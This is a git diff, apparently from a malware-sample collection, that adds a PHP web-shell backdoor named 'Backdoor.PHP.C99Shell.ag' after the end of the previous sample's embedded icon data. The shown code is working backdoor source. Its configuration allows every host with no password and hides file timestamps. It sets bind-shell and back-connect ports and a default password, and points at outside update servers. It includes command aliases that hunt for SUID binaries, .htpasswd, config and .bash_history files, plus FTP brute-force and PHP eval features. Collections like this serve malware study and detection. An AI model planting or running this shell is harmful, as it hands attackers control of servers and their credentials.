+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_wma"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_wmf"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA". +"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q". +"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3". +"EzWCgwARADs=", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7", +"ext_xsl"=> +"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA". +"gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh". +"SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD". +"dBKFfQABi0AAfoeZPEkSP6OkPyEAOw==", +"1"=> +"R0lGODlhGAASAPZKAAICAgISCgI6EgJqFj6aIkyiJhqWIg6WIgJ6GkKeIk6mJgJSFgJOFAIyEgJe". +"FjaKHkKSHkKOHgI+EiJyGjqCGjaCGj6KImKqQmauSgJGEipyFip2Gi52GgJWFgIqDjZ+HiJ+LgJW". +"GgJKEhBQGSZuHiJuFiJqFgImDlrOQiJuGiZ2HAJaFyaCHDKSHi5+GhJmFh5iFxpiFl6iQhp6Li6O". +"HkLCKjqqJjKCGhZuFhpaFhZaFgJeGjaqJj6yJjJ+Gi56GgJSEgJmGhZOFiJaGiZmIi52KkKKNlKe". +"PmKySnLGUnrWWip6GjaaIjKOHgJyGgIWCgoeCgIuDgJiFh5yFhJaFg5qFgp2GgqCHgJmHgJuGiZy". +"FiJmFiKCHiaOHg5OElqaQiqGLgJ2GipyGiZqGiJmGip+HiqOIi6WJhImFgJ+HhiCGiJ6GiJqGh5m". +"GiJ2GiaKHgImCkKONh52GhZyFhZ2GhZ+GhaGHlaWQmKmRl6iRgIiCwIeCgIaCgI2EgAAAAAAACwA". +"AAAAGAASAAAH/4AAAQIDBAUGAYiKiYwHjQGDCAkKBQsBlpiXmpkMAQ0ODxAREKSlpqemEhMUFa2u". +"rhYXGLO0tRkaGxwdHhm5uR8YICELGcUZIiIMDCMkJSYnKB4lJSkqGB0iKywtLi/FycswMTELJxkw". +"6DIzDCs0NTY3GzgZDAsdIzk5Ojr5/Rg7DFTw6OHjBwcNIoA4CDJCyBAiRYwcQZJECYYVC5YwafLD". +"4AaFA5yMeALlRBQJIjpIGfBvxZQbBTds0EClipUrIwJE0RnAA6QAGLBIyaKFg68tMCZw6ZLTSwAR". +"ATL8/AImS5gJYjaIGUOGRBkzZ3L+HBsADYY0atakYNOGDBs3LEfemMm5c6dPOJDMxuEiB4ffOXTq". +"qLHT9GnUwxLK3sGAJ4/jPHhoiSVLufJPujzvBsCLV08Az3sC8BEdoDBUqVITJ+7jqbXmQAA7", +"2"=> +"R0lGODlhPwASAOUDAFmwLFGkJUKQHmauSgBNEgBOEgBYFgBXFgBlGQBkGQByGgBxGgBzGgqAHQCB". +"HQ2BHQqCHRCCHSWNHySOHyWPICePICuXJSyWJSmXJSmPICeQISaPIBaFHQAQCgAZCgAXCgAWCgAU". +"CgASCgAlCgAhCgAfCgAbCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAPwASAAAG40CAcEgsGo/IpBIZ". +"aDqf0Kh0Sq1OBdisdsvter9g72BMLpvP6LR6nS643/C4fE6v2+/4vH4vNxz+B35/BoSCgYWAh4SJ". +"iIqLgYyJkokIlZaXmJmam5ydmwqgoaKjpKWmp6imEA4QrayrrbGys6+ztreuuLMPEBESv8DBwsPE". +"xcbHwxobFhfNF8zPztHT09DN0NbZ0tbU0s7QGeHhGuLi5OXo6eYa5+ru7xkbHPP09fb3+Pn6+/ls". +"/v8A/4kYSLCgwYMIEypcmNCDCBAPIzKcSLGiwREiSIgoIcKhQ4gQLYocKSIIADs=", +"3"=> +"R0lGODlhBgASAOUDAFmwLFGkJUKQHmauSmGoQz2IIDeCGwBUFwBZGiB/LjR+Hyt2GQBOEgBPFABV". +"Fyl0HgBXFgBYFwBbFwBjGTCEMFmiQQBmFwBpFwBtGQBzGhKCIGWtSgB2GwB6HQB/HQCCHRuIHwCE". +"HRCGHRKJHRKLHR2PICWPICSPIC2XJCyWJSmXJCmWJCmaJUOMO1iYQimPICyPIhImFB+IHySOIUGK". +"OAAQCliXQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAABgASAAAGSkCAcBgoGgXI5GBA". +"KBgMEERioFgwGA3I4AGRSCaUiuWCyWgGnI7nAxqERKNRaTAz2VGDFEvfcsH+MAMxMjM0gjVLNjE1". +"jI2Oj49BADs=", +"4"=> +"R0lGODlhQgASANQJAFmwLFGkJUKQHjeCGyt2GSFsFx1gFhtZFIrdY4zdZIndYobdYoPdYILdX4Dd". +"X3/dXgBvGQBuGQBwGQAQCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAA". +"QgASAAAFlSAgjmRpnmiqrkHrvnAsz3RtC3iu73zv/8DgYEgsGo/IpHLJJDif0Kh0Sq1ar4Wsdsvt". +"er/gsNhALpvP6LR6zW4f3vC4fE6v2+94hB6R6Pv/fnoJeguFhgiFDIqKDY2OjQ+GC3uCgJYRmJma". +"m5ydnpgSn6KeE6Wmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsMhADs=", +"5"=> +"R0lGODlhIQASAPYtAFmwLBqWIAASCg2VIEugJD6YIABqFwA6EAAAAFGkJQBSFABOFE2iJE6lJUKd". +"IgB5G0KQHkGPHTaJHQBdFgAzEDeCGzuBGiBxGQA+ECt2GQAtDQBFEi53GSpwFyFsFwAnDVrNQgAq". +"DSFqFyVsFxBQGR5hFhtgFhtZFBdZFIDdX3/dXobdYondYozdZInaYofYYYPTXn3MW3jEV3G6UWix". +"TF+lRVWYP0qLODx7LjNvKShhIRlYHRJQFxRKFA1GEgBuGQBlFwBaFABUFAAzDQ0dCgoZCgoWCgAW". +"CgAaCgAeCgAiCgAlCgA3EABKEg1OEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwA". +"AAAAIQASAAAH/4AAgoOCAQKGiIeKA4sCAAQFBgcCCAmWl5YKApqcm56dCwIJDA0OD5MQqaqrrK2u". +"ERASExQVtba3uLm6tRYXGBnAwcLDxMMKGhscGR0bHs7P0NHS0R8gISIeIyQl3N3e3+DfCh8bJtwk". +"J+nq6+zt7ijwJiQpKSor9yss+votLSwuL2DEkDGDRg0bN3Dk0LGDRw8fJH5InEixokQDQCYEEbJg". +"A4YhGj4QKWJEAAkBAo6kXIlEQMuWSQQokSlgSc2bIQRo0GnypYCYM23azElBQFEmAjAkFbCBqYAm". +"ApyYREm1qtWrWK2eXKlSpU+YNIPeHMpzJwmfQMcKIGpUAFKlSiObNoUqdWvWu3ipbu3K0qXftGKF". +"ri3b8y9NwWyPLo3rlK7JQAA7", +"font"=> +"/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAACgAA/+4ADkFkb2JlAGTAAAAAAf/b". +"AIQAFBAQGRIZJxcXJzImHyYyLiYmJiYuPjU1NTU1PkRBQUFBQUFERERERERERERERERERERERERE". +"RERERERERERERAEVGRkgHCAmGBgmNiYgJjZENisrNkREREI1QkRERERERERERERERERERERERERE". +"RERERERERERERERERERERERE/8AAEQgAlACUAwEiAAIRAQMRAf/EAHAAAAMBAQEAAAAAAAAAAAAA". +"AAACAwEEBgEBAAAAAAAAAAAAAAAAAAAAABAAAQMDAwMCBQIFBAMAAAAAAQAR4iGhAjESA0FhcVEi". +"8IGxwRPhwvFSgvIE0TJCYnKSohEBAAAAAAAAAAAAAAAAAAAAAP/aAAwDAQACEQMRAD8A85yO+rfO". +"SMMvTp3kjIkmvyrJPjk3WnmSCZyJLuPj+pM2QZ+veSTLlr28yVMeQkit5IMz4wA4y+P/AGUiW63k". +"unPMnWnx/wCS5ssvT6yQU489oZ9e8kFvW8k/DmG/WSjvO7W8kDbiOr/OSMcq0+slu7veSwcvobyQ". +"Bc6m8kbm63kjLItreSmM263kguSRi7hvMlIE7daeZLTyk47fvJZv9rPeSB+PlFHN5JuUhwxvJQxI". +"epvJVJALfeSBcvR7yWYgkt95KmTNreSXHLIGhf5yQY3Tr5khbuL9/MkIH5eQO7v85KQzJ63ktJ9r". +"veSUZt1vJBmRY1N5JvyBh27ySnJ6veSelK3kgtnlUg0Px3UTlVwbyVTlj0L/AB5UX73kgph7tcm+". +"clI5B6GnmSfAEuX7ayUiWOt5IH30d7yWYZN1vJLuej3kqYgnreSBs83x1vJSf1N5J26veSXI97yQ". +"dGO3Z8vWSRxs1r5kjEPjreSwYvjue8kExUO95LTyHqbyW8ebGpvJNzZuQxvJAm/veSrxkvreSgcj". +"63kqcRJOtPMkGv7nfr6yQt7PeSEGZ5FyD9ZJMcvU3kqZkklzeSHp7vrJBPLIPreSCSCK3kinQ3km". +"3gsB9ZIH5c2AANR/2/UKb97yVs8AA73ko5HveSCmPLtDfeSi7nW8lTHHdiwNX9ZKbt1f5yQGXq95". +"KoY1fp6yU3y9byVMX13afH8yBeTJgz3ksGYNHvJGWXTL6yWBh1vJBYPtcZfJ5KR5CcWGnmSc8hAH". +"j1kp45tT7yQbhkOpp5kmzOIIA+slmIchzeSblYEMbyQKW9byTY57TreSzIhqGvmSkSfW8kFvyV1v". +"JCVy2tfMkIN5OYE0L/OS0ZuKG8knKQDT6yT8eQABe8kGFuv1knOeIY4mvmShnybsne8lXEilbyQY". +"f8g5UJp5kkOXe8lbkxxxLg9fWSm/e8kG8eJy6t61ksdtDeSpxAkODr3koZ51Z9O8kGnkagN5Jxyg". +"9byUX73kqOB1vJBQl8XBr5kpO3W8lhyOr3kmJ7695IN3ECj+XkgY+13vJWxzGxn6eslHcW1p5kg3". +"HIir3ksy5zkdbyWDKoreSCADQv8AOSBssgRrXzJKC9HvJYToXvJNjlV3vJAbqs9fMkJfy+7W8kIN". +"5BtLPeSMPN5Izy9TXzJbg563kgnka0N5LRmSQHvJNl7Sz3kkGTHW8kHTy4ZYiuT/ADkucEvreSuf". +"8jeGP1kkOVdbyQU4ssgA1X7yXPmfca3kuri5RjiQTV/WS5+TJ8nBp5kgmS3W8loJPW8kwyB63kmx". +"yGNXvJApyo33kjfUVvJWzO7HdoK/GqiD3vJAEFv1kgZ0b7yXTjyDYzjT1kpbwBrXzJACoYm8kcjY". +"ZMDeSOM7tTTzJbyjHEit5IJ5Gmt5JsMhiam8kZZgdbySb3qDeSBt2O93p5khJ11vJCB8uQEu95IH". +"K1B9ZIzGzrTzJKM2IL3kgw51qbyTZ9jeSCXOtPMlmWTChvJBozb+MkmRrreSbHkHU3kseut5IOr/". +"AByAKm8lLMsSQbyWYEHreSUcrn9ZIDcDqW+ck4yx9byWbu95Jg3reSDCCQ708ySu3W8lXPNsaGnm". +"S5xyepvJBfHEbO/mSk3td7yTa47hleSXHIka08yQHGcnobyW8m5wcjeSbHMBq3kt5Mjk3T5yQSyJ". +"P8ZJ8GBd7yQdNbyWYgks7jzJAbxud7yQl9rs95IQPyA0BN5KenW8lXk5NzMdKayUhm9AbyQBypre". +"Sw5uNbyWkt1vJA7m8kGP3vJG7veSYZd6eZIJrreSBRkRV7yRjlXW8lXjALv9ZJMvaTWg7yQZln0e". +"8lozINTeSXd3vJM/w8kD5Znb+slHd3vJdBOO0jQ+ZKIHqbyQaOUtte8kwy9rPeSMdur18yT45A4d". +"/MkGcf8AM/X1kn5+bEttN5KfQl6eZJMyKAGnmSDTyd7yW4cjn9ZJMqdbyTcZ73kg1qt18yQm/IHd". +"7yQgzLIavr3kkNKg3km5CMdDeSXHMk63kgN/V7yTFmBB17ySZmut5IORYVvJA+BHU3kkyzrreSMM". +"u95Jz8VkgfibIO95JMg2RreSfiJqx07yU8+Ri5NfMkAcgOt5KgzB0N5Ln3P1vJbubreSDpzwYO95". +"KDtV7yTfnLN95LH7695IKBzj/up5kkFA73knx5iAB95JTmWp9ZIDfqH17yUn73krAghnr5kt5Msc". +"urHzJBHcepvJNhk51vJaR3vJGPIMTreSAY7tr3khDl9z18yQgzIsKm8kmJcs95J+XMZMxvJLiSC7". +"3kgCW63ktOb0+8kHNyS95LciWDG8kGA97yWDMuz3kgZd7yT6dbyQNhltBL08yU+XJ8nfXvJUxzAB". +"B+slPkz3VfXvJAm7veSbd3vJYC/W8k7j1vJBhyG3WvmS05UFbyQzhwbyWP0e8kFN4Ad3PnT/AOkn". +"5faz3kr45DbqNPWSmcBt3PeSDOPIUreStysQP9ZLlxJ9aeZKuZ29aeZIDIBtbyS7gOt5JDmT1vJO". +"MgRreSBfy/DyQl6s95IQV5d1H/clG743IQgT3dP3Kvu+NyEIEx3fG5GX5H/uQhA2O7/l+5FXpp/U". +"hCBMn6fuW4bvjchCBzvamn9SQbuv7kIQWDtRnb/son8jV0/qQhBuO7b/AHIz/J1/chCBDu+Ny3Dc". +"/wDchCA97/3IQhB//9k=", +"pdisk"=> +"R0lGODlhEQAMAOZkAODg34mJicfHx4GBguHh4WxsbObm5dDQ0H5+fnl5eYKCgv3+//Ly8t/f3svK". +"yqKios/PzsDAwKempktKS87NzaCgoE5OTnFyco2NjLu7u1JRVvf4+Pv+/4CAgMHAv9LS0mVldFdX". +"V0VFSsTDw7i4uXZ2dqSjpKWkpNzb24uLkMzM3efn5uzr60NDRoSEjmhnZ6usq+Tk49HR0HJyco6O". +"jlNTW3Z2hNjY2MHBwfHw8Dw8P9XV1KOjpNnZ2MvLytzc24mJjXh4ipeXl2JjY5STk25vdYqKiamp". +"qV1dXunp7Gxsa52cnHl5fZiYtrq6u9TU1ExMTq+vrvb3+FNTU+7t7srJyTQ0NO3s7Ozs63t8fE5N". +"Urq5unBwdZqamujn54CAktbV1X18fbW1tdTU0wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAGQALAAAAAARAAwAAAeLgGSCg4SFhoeIZCwoAmArFDtPC4UxABkJBSQMC1cAGw44PoNOYw0C". +"BAAMHFgNUkkqKUBeZBVLYqcGBzcfI11MLV82CGQSUUIKJlsyNJgDQ1ZNQUpkOQEBVTwdCmEWFwhF". +"IBpTWYMeAyUYJ1w6IjVQITNHP4RUEEQvLloTSAERBok9YBh5cCCRQUKBAAA7", +"odel"=> +"R0lGODlhEQAPAKIEAFQhHFQhG1MhG5QaHQAAAAAAAAAAAAAAACH5BAEAAAQALAAAAAARAA8AAAMq". +"SLrc/jDKIZoYb+iqgsbOVwFf9JGaRHypilLqxQaRl4rPu+AhuPuqYDABADs=" + +); +$imgequals = array( +"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), +"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"), +"ext_htaccess"=>array("ext_htaccess","ext_htpasswd") +); + ksort($arrimg); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) + { +if (in_array($img,$v)) {$img = $k;} + } + if (empty($arrimg[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($arrimg[$img]); + } + else + { + echo "
    "; + $k = array_keys($arrimg); + foreach ($k as $u) + { +echo $u.":
    "; + } + echo "
    "; + } + exit; +} +if ($act == "about") +{ + $dàta = "Any stupid copyrights and copylefts"; + echo $data; +} + +$microtime = round(getmicrotime()-$starttime,4); + +?> + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.C99Shell.ag b/PHP/Backdoor.PHP.C99Shell.ag new file mode 100644 index 00000000..b3eb6afc --- /dev/null +++ b/PHP/Backdoor.PHP.C99Shell.ag @@ -0,0 +1,3013 @@ +$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} +$shver = "Agen-007"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} +$surl_autofill_include = true; +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; +} +$surl = htmlspecialchars($surl); +$timelimit = 0; +$login = ""; //login +//DON'T FORGOT ABOUT PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = "Access denied !!!!"; +$gzipencode = true; //Encode with gzip? +$updatenow = false; //If true, update now (this variable will be false) +$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server +$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server +$filestealth = true; //if true, don't change modify- and access-time +$donated_html = "
    [I-_-I] - BrainScan
    "; + +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) +$log_email = "tes_server@yahoo.com"; //Default e-mail for sending logs +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = true; //If true then save sorting-position using cookies. +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: + 0 - files and folders (as default), + 1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "" (default) + string {closetag} - close html-tag, e.g. "" (default) + bool {break} - if true and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"",""), // example + array("config.php",1) // example +); +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8; // lines in hex preview file +$hexdump_rows = 24; // 16, 24 or 32 bytes in one line +$nixpwdperpage = 100; // Get first N lines from /etc/passwd +$bindport_pass = "mnbvzxc"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe +// Command-aliases +if (!$win) +{ + $cmdaliases = array( + array("--------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux 2nd extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("--------------------------------------------------------", "dir"), + array("show opened ports", "netstat -an") + ); +} +$sess_cookie = "c99shvars"; // Cookie-variable name +$usefsbuff = true; //Buffer-function +$copy_unset = false; //Remove copied files from buffer after pasting +//Quick launch +$quicklaunch = array( + array("\"Home\"",$surl), + array("\"Back\"","#\" onclick=\"history.back(1)"), + array("\"Forward\"","#\" onclick=\"history.go(1)"), + array("\"UPDIR\"",$surl."act=ls&d=%upd&sort=%sort"), + array("\"Refresh\"",""), + array("\"Search\"",$surl."act=search&d=%d"), + array("\"Buffer\"",$surl."act=fsbuff&d=%d"), + array("Encoder",$surl."act=encoder&d=%d"), + array("Tools",$surl."act=tools&d=%d"), + array("Proc.",$surl."act=processes&d=%d"), + array("FTP brute",$surl."act=ftpquickbrute&d=%d"), + array("Sec.",$surl."act=security&d=%d"), + array("SQL",$surl."act=sql&d=%d"), + array("PHP-code",$surl."act=eval&d=%d"), + array("Update",$surl."act=update&d=%d"), + array("Feedback",$surl."act=feedback&d=%d"), + array("Self remove",$surl."act=selfremove"), + array("Logout","#\" onclick=\"if (confirm('Are you sure?')) window.close()") +); +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); +//END CONFIGURATION +// \/ Next code isn't for editing \/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("Access Denied !!! - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
    "," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return false;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== false) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); 